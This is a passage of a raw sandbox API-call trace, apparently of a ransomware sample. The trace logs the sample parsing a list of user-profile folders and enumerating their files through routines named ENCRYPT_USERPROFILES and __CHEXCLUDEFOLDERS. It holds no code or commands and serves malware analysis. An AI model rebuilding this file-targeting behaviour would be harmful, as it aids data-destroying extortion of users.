wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.964] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.964] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.964] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ublic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="blic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0072.968] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.968] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.968] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.976] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.978] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.978] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0072.978] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0072.978] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.978] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="*", cchCount2=1) returned 2 [0072.979] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.979] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x61e598 | out: lpFindFileData=0x61e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b9e98, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8978 [0072.979] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e598 | out: lpFindFileData=0x61e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b9e98, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0072.979] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e598 | out: lpFindFileData=0x61e598*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b9e98, dwReserved1=0x657690, cFileName="AppData", cAlternateFileName="")) returned 1 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.979] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0072.979] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AppData", cchCount1=7, lpString2="AppData", cchCount2=7) returned 2 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0072.980] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0072.980] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.980] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.980] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0072.980] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b2d0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85d028b, nFileSizeHigh=0xb7fe7, nFileSizeLow=0x0, dwReserved0=0x2020e1a, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0072.981] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="Contacts", cAlternateFileName="")) returned 1 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.981] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: 